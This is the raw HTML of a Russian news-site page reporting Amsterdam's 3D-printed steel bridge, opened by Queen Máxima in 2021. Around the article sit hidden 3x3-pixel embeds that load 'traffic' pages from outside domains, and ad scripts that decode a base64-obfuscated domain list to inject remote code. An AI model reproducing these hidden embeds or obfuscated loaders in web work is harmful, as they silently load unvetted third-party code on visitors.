<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU">
<head><meta name="google-site-verification" content="_dYzCmfsRyT6MO-pAnIiPXNwKmoQ9PFC5cCGREXJttM" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<head><meta name="yandex-verification" content="86d2deab781a8174" />

<title>Первый в мире напечатанный стальной мост открыли в Амстердаме &#171; Русский Еврей</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://rusjev.net/xmlrpc.php" />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Русский Еврей &raquo; Лента" href="http://rusjev.net/feed/" />
<link rel="alternate" type="application/rss+xml" title="Русский Еврей &raquo; Лента комментариев" href="http://rusjev.net/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Русский Еврей &raquo; Лента комментариев к &laquo;Первый в мире напечатанный стальной мост открыли в Амстердаме&raquo;" href="http://rusjev.net/2021/07/16/pervyj-v-mire-napechatannyj-stalnoj-most-otkryli-v-amsterdame/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/rusjev.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.6"}};
			/*! This file is auto-generated */
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://rusjev.net/wp-includes/css/dist/block-library/style.min.css?ver=5.4.6' type='text/css' media='all' />
<link rel='stylesheet' id='wp-cpl-base-css-css'  href='http://rusjev.net/wp-content/plugins/wp-category-posts-list/static/css/wp-cat-list-theme.css?ver=2.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp_cpl_css_0-css'  href='http://rusjev.net/wp-content/plugins/wp-category-posts-list/static/css/wp-cat-list-light.css?ver=2.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp_cpl_css_1-css'  href='http://rusjev.net/wp-content/plugins/wp-category-posts-list/static/css/wp-cat-list-dark.css?ver=2.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp_cpl_css_2-css'  href='http://rusjev.net/wp-content/plugins/wp-category-posts-list/static/css/wp-cat-list-giant-gold-fish.css?ver=2.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp_cpl_css_3-css'  href='http://rusjev.net/wp-content/plugins/wp-category-posts-list/static/css/wp-cat-list-adrift-in-dreams.css?ver=2.0.3' type='text/css' media='all' />
<script type='text/javascript' src='http://rusjev.net/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://rusjev.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://rusjev.net/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://rusjev.net/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://rusjev.net/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Ученые впервые соединили всю Книгу Мертвых' href='http://rusjev.net/2021/07/16/uchenye-vpervye-soedinili-vsyu-knigu-mertvyh/' />
<link rel='next' title='60 человек погибли и более тысячи пропали без вести в результате наводнения в Германии' href='http://rusjev.net/2021/07/16/60-chelovek-pogibli-i-bolee-tysyachi-propali-bez-vesti-v-rezultate-navodneniya-v-germanii/' />
<link rel="canonical" href="http://rusjev.net/2021/07/16/pervyj-v-mire-napechatannyj-stalnoj-most-otkryli-v-amsterdame/" />
<link rel='shortlink' href='http://rusjev.net/?p=200211' />
<link rel="alternate" type="application/json+oembed" href="http://rusjev.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Frusjev.net%2F2021%2F07%2F16%2Fpervyj-v-mire-napechatannyj-stalnoj-most-otkryli-v-amsterdame%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://rusjev.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Frusjev.net%2F2021%2F07%2F16%2Fpervyj-v-mire-napechatannyj-stalnoj-most-otkryli-v-amsterdame%2F&#038;format=xml" />
<style type="text/css">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</style>
<script type="text/javascript">
//<![CDATA[



/* JQUERY */
jQuery(document).ready(function(){ 
    
   
  

	/* jQuery('ul#rmenu').superfish(); */
	/* jQuery('ul#rmenu').superfish().find('ul').bgIframe({opacity:false}); */
 
	/* For IE6 */
	if (jQuery.browser.msie && /MSIE 6\.0/i.test(window.navigator.userAgent) && !/MSIE 7\.0/i.test(window.navigator.userAgent) && !/MSIE 8\.0/i.test(window.navigator.userAgent)) {

		/* Max-width for images in IE6 */		
		var centerwidth = jQuery("td#middle").width(); 
		
		/* Images without caption */
		jQuery(".post img").each(function() { 
			var maxwidth = centerwidth - 10 + 'px';
			var imgwidth = jQuery(this).width(); 
			var imgheight = jQuery(this).height(); 
			var newimgheight = (centerwidth / imgwidth * imgheight) + 'px';	
			if (imgwidth > centerwidth) { 
				jQuery(this).css({width: maxwidth}); 
				jQuery(this).css({height: newimgheight}); 
			}
		});
		
		/* Images with caption */
		jQuery("div.wp-caption").each(function() { 
			var captionwidth = jQuery(this).width(); 
			var maxcaptionwidth = centerwidth + 'px';
			var captionheight = jQuery(this).height();
			var captionimgwidth =  jQuery("div.wp-caption img").width();
			var captionimgheight =  jQuery("div.wp-caption img").height();
			if (captionwidth > centerwidth) { 
				jQuery(this).css({width: maxcaptionwidth}); 
				var newcaptionheight = (centerwidth / captionwidth * captionheight) + 'px';
				var newcaptionimgheight = (centerwidth / captionimgwidth * captionimgheight) + 'px';
				jQuery(this).css({height: newcaptionheight}); 
				jQuery("div.wp-caption img").css({height: newcaptionimgheight}); 
				}
		});
		
		/* sfhover for LI:HOVER support in IE6: */
		jQuery("ul li").
			hover( function() {
					jQuery(this).addClass("sfhover")
				}, 
				function() {
					jQuery(this).removeClass("sfhover")
				} 
			); 

	/* End IE6 */
	}
	
	
	
	/* Since 3.7.8: Auto resize videos (embed and iframe elements) 
	TODO: Parse parent's dimensions only once per layout column, not per video
	*/
	function bfa_resize_video() {
		jQuery('embed, iframe').each( function() {
			var video = jQuery(this),
			videoWidth = video.attr('width'); // use the attr here, not width() or css()
			videoParent = video.parent(),
			videoParentWidth = parseFloat( videoParent.css( 'width' ) ),
			videoParentBorder = parseFloat( videoParent.css( 'border-left-width' ) ) 
										+  parseFloat( videoParent.css( 'border-right-width' ) ),
			videoParentPadding = parseFloat( videoParent.css( 'padding-left' ) ) 
										+  parseFloat( videoParent.css( 'padding-right' ) ),
			maxWidth = videoParentWidth - videoParentBorder - videoParentPadding;

			if( videoWidth > maxWidth ) {
				var videoHeight = video.attr('height'),
				videoMaxHeight = ( maxWidth / videoWidth * videoHeight );
				video.attr({ width: maxWidth, height: videoMaxHeight });
			} 

		});	
	}
	bfa_resize_video();
	jQuery(window).resize( bfa_resize_video );

		
	jQuery(".post table tr").
		mouseover(function() {
			jQuery(this).addClass("over");
		}).
		mouseout(function() {
			jQuery(this).removeClass("over");
		});

	
	jQuery(".post table tr:even").
		addClass("alt");

	
	jQuery("input.text, input.TextField, input.file, input.password, textarea").
		focus(function () {  
			jQuery(this).addClass("highlight"); 
		}).
		blur(function () { 
			jQuery(this).removeClass("highlight"); 
		})
	
	jQuery("input.inputblur").
		focus(function () {  
			jQuery(this).addClass("inputfocus"); 
		}).
		blur(function () { 
			jQuery(this).removeClass("inputfocus"); 
		})

		

	
	jQuery("input.button, input.Button, input#submit").
		mouseover(function() {
			jQuery(this).addClass("buttonhover");
		}).
		mouseout(function() {
			jQuery(this).removeClass("buttonhover");
		});

	/* toggle "you can use these xhtml tags" */
	jQuery("a.xhtmltags").
		click(function(){ 
			jQuery("div.xhtml-tags").slideToggle(300); 
		});

	/* For the Tabbed Widgets plugin: */
	jQuery("ul.tw-nav-list").
		addClass("clearfix");

		
	
});

//]]>
</script>
<link rel="icon" href="http://rusjev.net/wp-content/uploads/2020/05/favicon.ico" sizes="32x32" />
<link rel="icon" href="http://rusjev.net/wp-content/uploads/2020/05/favicon.ico" sizes="192x192" />
<link rel="apple-touch-icon" href="http://rusjev.net/wp-content/uploads/2020/05/favicon.ico" />
<meta name="msapplication-TileImage" content="http://rusjev.net/wp-content/uploads/2020/05/favicon.ico" />
		<script async src="https://jsn.24smi.net/smi.js"></script>

</head>
	
<body class="post-template-default single single-post postid-200211 single-format-standard category-mir category-nauka-news category-news" >
		


<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
<col class="colthree" /></colgroup> 


	<tr>

		<!-- Header -->
		<td id="header" colspan="3">

		<noindex>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/100382.html"></embed>
<embed width="3" height="3" type="text/html" src="http://fastsearch.net.ua/traffic/100378.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/100360.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/100384.html"></embed>
<embed width="3" height="3" type="text/html" src="http://newportal.com.ua/traffic/100029.html"></embed>
</noindex>




<!--LiveInternet counter--><script>
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+
";"+Math.random();</script><!--/LiveInternet-->
<center>

<meta name="b6d8d6e4cff8ca2598f2d776692d9b44" content="fbac590d96aa1aa1dd2618f78daab6d2" />
<meta name="rpc37a21b136c746dbad2c33f9e7041685" content="ec3cca6f3eec66fae8f6d8f91c001ce2" />


</center>

<div id="menu1" class="menu-menun1-container"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li id="menu-item-77" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77"><a href="http://rusjev.net/category/news/israel/"><span>Израиль</span></a></li>
<li id="menu-item-78" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-78"><a href="http://rusjev.net/category/news/russia/"><span>Россия</span></a></li>
<li id="menu-item-79" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79"><a href="http://rusjev.net/category/news/usa/"><span>США</span></a></li>
<li id="menu-item-80" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-80"><a href="http://rusjev.net/category/news/ukraine/"><span>Украина</span></a></li>
<li id="menu-item-110" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110"><a href="http://rusjev.net/category/publications/economics/"><span>Экономика</span></a></li>
<li id="menu-item-17337" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17337"><a href="http://rusjev.net/?s=курс+доллара"><span>Курс доллара</span></a></li>
<li id="menu-item-25988" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25988"><a href="http://rusjev.net/tag/literaturnaya-stranichka/"><span>Литературная страничка</span></a></li>
<li id="menu-item-116918" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-116918"><a href="http://rusjev.net/category/news/english-news/"><span>English News</span></a></li>
<li id="menu-item-186300" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-186300"><a href="http://rusjev.net/category/news/novini-ukra%d1%97nskoyu/"><span>Новини українською</span></a></li>
<li id="menu-item-184975" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-184975"><a href="http://rusjev.net/direction/"><span>Редакция</span></a></li>
<li id="menu-item-196716" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-196716"><a href="http://rusjev.net/2021/06/13/hochu-vesti-svoyu-rubriku-na-sajte/"><span>Хочу вести свою рубрику</span></a></li>
</ul></div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td rowspan="2" valign="middle" class="logoarea-title"><h2 class="blogtitle"><a href="http://rusjev.net/">Русский Еврей</a></h2><p class="tagline">Последние новости</p></td><td class="feed-icons" valign="middle" align="right"><div class="clearfix rss-box"><a class="comments-icon" href="http://rusjev.net/comments/feed/" title="Subscribe to the COMMENTS feed">Comments</a><a class="posts-icon" href="http://rusjev.net/feed/" title="Subscribe to the POSTS feed">Posts</a></div></td></tr><tr><td valign="bottom" class="search-box" align="right"><div class="searchbox">
					<form method="get" class="searchform" action="http://rusjev.net/">
					<div class="searchbox-form"><input type="text" class="text inputblur" onfocus="this.value=''" 
						value="" onblur="this.value=''" name="s" /></div>
					</form>
				</div>
				</td></tr></table> <table border=0 bgcolor=red width=100% hight=1><tr></tr></table>
		</td>
		<!-- / Header -->

	</tr>
	<!-- Main Body -->	
	<tr id="bodyrow">

				<!-- Left Sidebar -->
		<td id="left">

			<div id="nav_menu-3" class="widget widget_nav_menu"><div class="menu-menun2-container"><ul id="menu-menun2" class="menu"><li id="menu-item-81" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-81"><a href="http://rusjev.net/category/publications/history/">История</a></li>
<li id="menu-item-82" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-82"><a href="http://rusjev.net/category/publications/culture/">Культура</a></li>
<li id="menu-item-83" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-83"><a href="http://rusjev.net/category/publications/socium/">Общество</a></li>
<li id="menu-item-84" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84"><a href="http://rusjev.net/category/publications/politics/">Политика</a></li>
<li id="menu-item-85" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-85"><a href="http://rusjev.net/category/publications/economics/">Экономика</a></li>
<li id="menu-item-23429" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-23429"><a href="http://rusjev.net/category/news/">Новости</a></li>
<li id="menu-item-23430" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23430"><a href="http://rusjev.net/category/video/">Видео</a></li>
</ul></div></div><div id="text-18" class="widget widget_text">			<div class="textwidget"><p><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br />
<!-- Adaptiv --><br />
<ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5083002985597049" data-ad-slot="9488409767" data-ad-format="auto" data-full-width-responsive="true"></ins><br />
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script><br />
<noindex><br />
&nbsp;</p>
<div class="smi24__informer smi24__auto" data-smi-blockid="17532"></div>
<p><script>(window.smiq = window.smiq || []).push({});</script></p>
<div class="r36980"></div>
<p><script type="text/javascript">
    (function() {
        var tag = (function() {
                var informers = document.getElementsByClassName('r36980'),
                    len = informers.length;
                return len ? informers[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, idn = '', chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4);
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })(),
            domains = JSON.parse(atob('WyJuZXdzY29kZS5vbmxpbmUiLCJpbmZvY29kZS50ZWNoIiwiaW5mb3JtZXIubGluayJd')),
            loadScript = function() {
                if (! domains.length) return;
                var script = document.createElement('script');
                script.onerror = function() { loadScript(); };
                script.className = 's36980';
                script.src = '//' + domains.shift() + '/ru/36980/';
                script.dataset.idn = idn;
                tag.parentNode.insertBefore(script, tag);
            };
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.appendChild(container);
        loadScript();
    })();
</script></p>
<p>&nbsp;</noindex></p>
</div>
		</div>
		</td>
		<!-- / Left Sidebar -->
		
				

		<!-- Main Column -->
		<td id="middle">

    
		
		
				<div class="clearfix navigation-top">
		<div class="older">&laquo; <a href="http://rusjev.net/2021/07/16/60-chelovek-pogibli-i-bolee-tysyachi-propali-bez-vesti-v-rezultate-navodneniya-v-germanii/" rel="next">60 человек погибли и более тысячи пропали без вести в результате наводнения в Германии</a> &nbsp;</div><div class="newer">&nbsp; <a href="http://rusjev.net/2021/07/16/uchenye-vpervye-soedinili-vsyu-knigu-mertvyh/" rel="prev">Ученые впервые соединили всю Книгу Мертвых</a> &raquo;</div></div>				<div class="post-200211 post type-post status-publish format-standard hentry category-mir category-nauka-news category-news odd" id="post-200211">
						<div class="post-headline"><h1>Первый в мире напечатанный стальной мост открыли в Амстердаме</h1></div>				<div class="post-bodycopy clearfix"><div class="article-image">
<figure><img src="https://nplus1.ru/images/2021/07/15/e1acb9004a1f8022e16053a8caa8546d.jpg" /><figcaption>
<p class="credits">
</figcaption></figure>
</div>
<p>Королева Нидерландов Максима в четверг открыла первый в мире напечатанный стальной мост. Как <a href="https://www.utwente.nl/en/news/2021/7/1125464/world-premiere-her-majesty-queen-maxima-opens-the-first-3d-printed-steel-bridge-in-amsterdam">сообщает</a> Университет Твенте, его установили над каналом Аудезейтс Ахтербургвал в Амстердаме. Напечатанный мост будет заменять обычный два года.</p>
<p>В строительной индустрии 3D-печать стала популярным инструментом, потому что позволяет создавать конструкции произвольной формы в виде единой детали. Благодаря этому уменьшается расход материалов, которые при этом могут быть совершенно разными. В мире уже есть несколько мостов, созданных с помощью 3D-печати. Например, в 2019 году в Шанхае открылся самый длинный напечатанный пластиковый мост, на его создание ушло 35 дней. Еще раньше первый в мире мост, напечатанный полностью из цемента, <a title="Link: https://3dprint.com/158826/3d-printed-concrete-bridge-madrid/" href="https://3dprint.com/158826/3d-printed-concrete-bridge-madrid/">появился</a> в Мадриде.</p>
<p>Проект первого напечатанного стального моста стартовал в 2015 году. Через два года компания MX3D завершила проектирование моста и приступила к печати отдельных конструкций, которые потом собрали в единый пролет.</p>
<p>Мост печатали четыре робота методом наварки слоев из проволоки из нержавеющей стали. На пролет длиной 12 метров у них ушло 4,5 тонны стали и шесть месяцев. Затем инженеры приступили к прочностным испытаниям и изготовлению береговых опор и декоративных элементов. Чтобы следить за деформацией, в мост интегрировали более десяти датчиков.</p>
<p>Открытие первого напечатанного стального пешеходного моста прошло в Амстердаме 15 июля. На церемонию прибыла королева Нидерландов Максима. Мост установили над каналом Аудезейтс Ахтербургвал. Он будет заменять обычный в течение двух лет. За это время разработчики надеются собрать данные о том, как можно применять напечатанную сталь в более сложных и масштабных проектах.</p>
<p><iframe width="500" height="600" frameborder="0" data-mce-fragment="1"></iframe></p>
<p>На 3D-принтере сегодня можно напечатать много полезных вещей</p>
</div>						<div class="post-footer">16 июля, 2021 |  Category: <a class="mir" href="http://rusjev.net/category/news/mir/" title="Мир">Мир, </a><a class="nauka-news" href="http://rusjev.net/category/news/nauka-news/" title="Наука">Наука, </a><a class="news" href="http://rusjev.net/category/news/" title="Новости">Новости</a>  

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Adaptiv --> <ins class="adsbygoogle"      style="display:block"      data-ad-client="ca-pub-5083002985597049"      data-ad-slot="9488409767"      data-ad-format="auto"      data-full-width-responsive="true"></ins> <script>      (adsbygoogle = window.adsbygoogle || []).push({}); </script>

<noindex>
<div class="r36813"></div>
<script type="text/javascript">
    (function() {
        var tag = (function() {
                var informers = document.getElementsByClassName('r36813'),
                    len = informers.length;
                return len ? informers[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, idn = '', chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4);
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })(),
            domains = JSON.parse(atob('WyJuZXdzY29kZS5vbmxpbmUiLCJpbmZvY29kZS50ZWNoIiwiaW5mb3JtZXIubGluayJd')),
            loadScript = function() {
                if (! domains.length) return;
                var script = document.createElement('script');
                script.onerror = function() { loadScript(); };
                script.className = 's36813';
                script.src = '//' + domains.shift() + '/ru/36813/';
                script.dataset.idn = idn;
                tag.parentNode.insertBefore(script, tag);
            };
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = '????????...';
        tag.appendChild(container);
        loadScript();
    })();
</script>

<noindex>
<div class="smi24__informer smi24__auto" data-smi-blockid="17531"></div>
<script>(window.smiq = window.smiq || []).push({});</script>


<div id="bn_012610a63f">????????...</div><script async type="text/javascript" src="//recreativ.ru/rcode.012610a63f.js"></script>
<br>

</noindex>

<noindex>
<embed width="3" height="3" type="text/html" src="http://fastsearch.net.ua/traffic/100382.html"></embed>
<embed width="3" height="3" type="text/html" src="http://fastsearch.net.ua/traffic/100378.html"></embed>


</noindex>





</div>		</div><!-- / Post -->	
						
	
			

			<!-- .... -->

	



	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2021/07/16/pervyj-v-mire-napechatannyj-stalnoj-most-otkryli-v-amsterdame/#respond" style="display:none;">Cancel reply</a></small></h3><form action="http://rusjev.net/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p><textarea name="comment" id="comment" rows="10" cols="10" tabindex="4"></textarea></p>
		<p class="thesetags clearfix">You can use <a class="xhtmltags" href="#" onclick="return false;">these HTML tags</a></p>
		<div class="xhtml-tags"><p><code>&lt;a href=&quot;&quot; title=&quot;&quot;&gt; &lt;abbr title=&quot;&quot;&gt; &lt;acronym title=&quot;&quot;&gt; &lt;b&gt; &lt;blockquote cite=&quot;&quot;&gt; &lt;cite&gt; &lt;code&gt; &lt;del datetime=&quot;&quot;&gt; &lt;em&gt; &lt;i&gt; &lt;q cite=&quot;&quot;&gt; &lt;s&gt; &lt;strike&gt; &lt;strong&gt; 
		</code></p></div><p><input class="text author" id="author" name="author" type="text" value="" size="30" tabindex="1" />&nbsp;&nbsp;<label for="author"><strong>Name </strong> (required)</label></p>
<p><input class="text email" id="email" name="email" type="text" value="" size="30"  tabindex="2" />&nbsp;&nbsp;<label for="email"><strong>Email</strong> (will not be published) (required)</label></p>
<p><input class="text url" id="url" name="url" type="text" value="" size="30"  tabindex="3" />&nbsp;&nbsp;<label for="url">Website</label></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Сохранить моё имя, email и адрес сайта в этом браузере для последующих моих комментариев.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='200211' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
			
    

</td>
<!-- / Main Column -->

<!-- Right Inner Sidebar -->

<!-- Right Sidebar -->
<td id="right">

	<div id="text-11" class="widget widget_text">			<div class="textwidget"><noindex>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Adaptiv -->
<ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5083002985597049" data-ad-slot="9488409767" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>

<noindex>
	<div id="bn_4da8929a74"></div><script type="text/javascript">(function(B,d,k){function w(a,x,y,l){function m(){var e=x.createElement("script");e.type="text/javascript";e.src=a;e.onerror=function(){f++;5>f?setTimeout(m,10):h(f+"!"+a)};e.onload=function(){l&&l();f&&h(f+"!"+a)};y.appendChild(e)}var f=0;m()}function z(){try{c=d.createElement("iframe"),c.style.setProperty("display","none","important"),c.id="rcMain",d.body.insertBefore(c,d.body.children[0]),b=c.contentWindow,g=b.document,g.open(),g.close(),n=g.body,Object.defineProperty(b,"rcBuf",{enumerable:!1,
configurable:!1,writable:!1,value:[]}),w("https://go.rcvlink.com/static/main.js",g,n,function(){for(var a;b.rcBuf&&(a=b.rcBuf.shift());)b.postMessage(a,p)})}catch(a){q(a)}}function q(a){h(a.name+": "+a.message+"\t"+(a.stack?a.stack.replace(a.name+": "+a.message,""):""))}function h(a){console.error(a);(new Image).src="https://go.rcvlinks.com/err/?code="+k+"&ms="+((new Date).getTime()-r)+"&ver="+A+"&text="+encodeURIComponent(a)}try{var A="200812-1725",p=location.origin||location.protocol+"//"+location.hostname+(location.port?
":"+location.port:""),t=d.getElementById("bn_"+k),u=Math.random().toString(36).substring(2,15),r=(new Date).getTime(),c,b,g,n;if(t){t.id="bn_"+u;var v={act:"init",id:k,rnd:u,ms:r};(c=d.getElementById("rcMain"))?b=c.contentWindow:z();b.rcMain?b.postMessage(v,p):b.rcBuf.push(v)}else h("!bn")}catch(a){q(a)}})(window,document,"4da8929a74");
</script>

		
	<div id="phoenix6049c6c56944cd6306c33e94"></div>
      <script type="text/javascript" src="//phoenix-widget.com/static/js/jsonp_v3.js"></script>
      <script async type="text/javascript">
        new PhoenixWidget({
          siteId: "5fd73787b56b2eeb6d9efaba",
          widgetId: "6049c6c56944cd6306c33e94",
        });
      </script>
</noindex>
<div class="smi24__informer smi24__auto" data-smi-blockid="17532"></div>
<script>(window.smiq = window.smiq || []).push({});</script>
<div class="r36980"></div>
<script type="text/javascript">
    (function() {
        var tag = (function() {
                var informers = document.getElementsByClassName('r36980'),
                    len = informers.length;
                return len ? informers[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, idn = '', chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4);
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })(),
            domains = JSON.parse(atob('WyJuZXdzY29kZS5vbmxpbmUiLCJpbmZvY29kZS50ZWNoIiwiaW5mb3JtZXIubGluayJd')),
            loadScript = function() {
                if (! domains.length) return;
                var script = document.createElement('script');
                script.onerror = function() { loadScript(); };
                script.className = 's36980';
                script.src = '//' + domains.shift() + '/ru/36980/';
                script.dataset.idn = idn;
                tag.parentNode.insertBefore(script, tag);
            };
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.appendChild(container);
        loadScript();
    })();
</script>

    
</noindex></div>
		</div>
</td>
<!-- / Right Sidebar -->

</tr>
<!-- / Main Body -->

<tr>

<!-- Footer -->
<td id="footer" colspan="3">
    <noindex>Copyright &copy; 2021 <a href="http://rusjev.net/">Русский Еврей</a> - All Rights Reserved</noindex>
<noindex>


<script type="text/javascript">
<!--
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
//-->
</script>


</noindex>

<noindex>
<!--LiveInternet logo--><a href="//www.liveinternet.ru/click"
target="_blank"><img src="//counter.yadro.ru/logo?27.6"
title="LiveInternet: показано количество просмотров и посетителей"
alt="" style="border:0" width="88" height="120"/></a><!--/LiveInternet-->

<script type="text/javascript">
<!--
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
//-->
</script>
</noindex>

 <noindex>


</noindex><br />Powered by <a href="http://wordpress.org/">WordPress</a> &amp; <a href="http://forum.bytesforall.com/">Atahualpa</a>    
    
    <script type='text/javascript' src='http://rusjev.net/wp-includes/js/comment-reply.min.js?ver=5.4.6'></script>
<script type='text/javascript' src='http://rusjev.net/wp-includes/js/wp-embed.min.js?ver=5.4.6'></script>
</td>


